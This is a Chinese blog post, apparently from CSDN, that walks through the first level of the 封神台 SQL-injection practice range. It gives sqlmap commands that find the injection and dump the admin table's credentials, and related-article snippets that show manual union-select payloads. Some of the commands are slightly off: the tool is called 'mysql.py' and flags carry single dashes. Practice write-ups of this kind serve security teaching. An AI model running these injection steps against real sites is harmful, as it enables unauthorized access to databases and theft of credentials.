如何使用sqlmap破解封神台靶场第一关

最新推荐文章于 2024-05-14 18:56:50 发布
最新推荐文章于 2024-05-14 18:56:50 发布
阅读量1.5k 收藏 8
点赞数 1
分类专栏: sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44490353/article/details/111308759
版权

文章目录

一.查看是否有注入

使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch
-u指令为查看网址的url是否有漏洞。-batch为永远不要求用户输入信息,默认执行。

在的这里插入图片描述我们可以看到,存在sql注入漏洞。

二.查找当前数据库

mysql.py -u http://59.63.200.79:8003/?id=1 -current-db -batch
-cuurent-db 意思为查找当前的数据库信息,也可以用-dbs查找所有的数据库。
在这里插入图片描述

三.查询数据库的表

上面我们已知当前数据库为 maoshe,所以我们指定数据库查询表。
mysql.py -u http://59.63.200.79:8003/?id=1 -D “maoshe” -tables -batch
-D为指定数据库 -tables为查询当前数据库所在的表。
在这里插入图片描述得出查询到的当前数据库表为admin dirs news xss4个。

四.查询表中的列

一般管理员的帐号密码都会在admin里面,所以我们可以查看下admin里面的字段。
mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -columns -batch
这里的-t为指定表,然后使用-columns 查看字段名称
在这里插入图片描述我们可以得知,字段名称为id,password,username三个。所以我们提取username和password就可以了。

五.查询具体内容

使用 mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C “username,password” -dump -batch
这里的-C为指定字段名称,-dump代表查询出字段。
在这里插入图片描述最后我们得出admin密码为helloback,这个就是本题的flag。

AdamZx
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
注入(一)
tomyyyyy
06-28 272
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
神台基础第一关
weixin_44106116的博客
11-19 1731
1.判断是否存在SQL注入 点击新闻,看到了地址栏变化,产生了id传参 分别输入,and 1=1 和,and 1=2 显示页面不同,所以,存在sql注入 2.查询字段数,好用联合查询 order by 2 有显示,order by 3 无显示,可知此条语句字段数为2 在之后输入 and 1=2 union select 1,2 注销掉前方的查询语句,查看回显点, 新闻内容中显示了数字2 根据...
SQL注入工具sqlmap安装使用详解&靶场实验
最新发布
05-14 692
SQL注入工具sqlmap安装使用详解&靶场实验,还有SQL注入攻击流程和MySQL攻击思路解读。
SQl靶场第一关,傻子看了都会!
JINWANYOUYUE的博客
06-09 104
id=-1' union select 1,2,3--+查看一下显示位回显,发现2,3位可以输入内容。id=-1' union select 1,version(),database()--+加单引号是为了之前的数据形成闭合,相同功能的符号还有很多比如[ ' " % ) ]通过常识我们推测密码在 username 和 password 当中。后缀加上--+和#是注释的意思 注释完 后边的数据就失去作用了。在闭合后边______ 注释前边输入自己的数据。数据库名称database()security。
SQL注入漏洞_神台第一关
gou1791241251的博客
12-13 739
SQL注入漏洞_神榜第一关 http://59.63.200.79:8003/?id=1 一、观察疑似可注入点 ?id=1 二、尝试输入单引号和双引号 使用hackbar进行测试比较好 以下是正常显示的结果 以下是输入单引号或双引号的结果 输入单引号时发现页面的内容不见了。同样试试双引号 同样也是一样的结果。在输入–+注释后面的SQL代码时还是同样的页面显示。由此可以判定这一是数字型注入。那么可以测试一下把双引号或单引号去掉试试看 此时发现页面是正常显示的。如第一张图片。 验证了这个是数字型注入。
神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 724
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
第一节 Sqlmap介绍-01
09-15
Sqlmap 是一个开源的渗透测试工具,能够自动化检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开,从数据库指纹、从数据库获取数据到访问...
SQLMAP使用笔记.pdf
01-25
一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、常用参数 1. `-f`:指定指纹判别数据库类型 2. `-b`:...
第十一节 Sqlmap注入参数2-01
09-15
Sqlmap是一款功能强大且广泛应用的SQL注入工具,本节课程将详细介绍Sqlmap的四个重要参数:强制设置无效值替换、自定义注入负载位置、设置Tamper脚本和设置DBMS认证。 Sqlmap强制设置无效值替换 在 Sqlmap 中,...
Sqlmap使用手册中文版
01-13
Sqlmap使用手册中文版 Sqlmap是十分著名的、自动化的SQL注入工具。 sqlmap简介 sqlmap支持五种不同的注入模式: 基于布尔的盲注 基于时间的盲注 基于报错注入 联合查询注入 堆叠注入 Sqlmap是开源的自动化SQL注入...
sqlmap破解版 终极版 附带教程
06-16
sqlmap破解版 终极版 附带教程
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台靶场SQL注入——SQLmap简单使用
m0_72592923的博客
01-13 1060
神台靶场SQL注入——SQLmap简单使用
神台靶场-第一章
Mr_helloword的博客
07-12 2726
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码! 寻找注入点,判断是什么注入 |?id=1 and 1=1| 显示正常 | |-|–| | ?id=1and 1=2| 页面有变故(存在注入) | |?id=1’ | 页面有回显但是无法判断注入类型| ||| 查看列数及字段数(这里通过二分法可以快速定位列数为2) 联合查询(注意前面id为假才会执行后门的联合查询) |?id=121 union select 1,2 #| 查看回显位置 | |–|--| |?id=1
ctf实战 掌控安全的靶场 第一关记录
wh1te 小白的博客
09-17 5803
第一关 进入传送门  发现是一个猫舍网站  点击查看新闻   进入猫舍界面内 网址为http://120.203.13.75:6815/?id=1  疑似可注入  尝试 and1=1回显正常 尝试 and1=2回显失败 存在sql注入  可以选择手工注入  也可以直接用工具   这里我用的是sqlmap(一个很强大的工具) sqlmap具体使用方法自己百度 贴一个比较好的...
神台——第一题:为了女神小芳
分享简单的安全技术
01-17 691
题目:获取数据库管理员密码 题目传送阵 渗透步骤        第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。        第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基
初识sqlmap学习笔记(神台靶场第一题:为了女神小芳!)
qq_66013948的博客
09-17 180
在网页中,我们有的时候会在上方的可以输入url的地方进行输入,比如输入一个url,或者直接用其进行搜索。如果我们正常输入name的参数和密码,这就是一个正常的查询,不过我们把密码输错了,那就可能会导致查询不到数据,或者显示密码错误。这个时候,无论我们输入的密码是什么,这个数据库的查询都是正确的查询,因此,这会给黑客一个不用管理员密码就可以直接登录为管理员的一个方法,也就是专业人士口中的sql注入漏洞。可以看到admin是管理员,于是,管理员的密码也就是hellohack,那么,这道题的flag也就是这个。
神台】有WAF的SQL注入
qq_63806300的博客
12-26 336
神台、waf、sql注入
手把手教你使用sql注入来绕过游戏后台检测
网易搬砖选手
07-09 730
SQL注入毫无疑问是最危险的Web漏洞之一,因为我们将所有信息都存储在数据库中。其解决方案之一,有许多公司实施Web应用程序防火墙和入侵检测/预防系统来试图保护自己。但不幸的是,这些对策往...
sqlmap跑sqli-labs靶场第一关
01-06
以下是使用sqlmap跑sqli-labs靶场第一关的步骤: 1. 下载并安装sqlmap工具。你可以从官方网站下载sqlmap工具并按照说明进行安装。 2. 打开终端或命令提示符,并导航到sqlmap的安装目录。 3. 运行以下命令来检测目标网站是否存在SQL注入漏洞: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs ``` 这个命令将使用sqlmap工具对目标网站进行扫描,并尝试发现数据库。 4. 如果目标网站存在SQL注入漏洞,sqlmap将返回数据库的名称。你可以使用以下命令来获取数据库的名称: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs --batch --dump ``` 这个命令将获取数据库的名称,并尝试获取数据库中的表和数据。 请注意,上述命令中的URL和参数可能需要根据你的实际情况进行修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值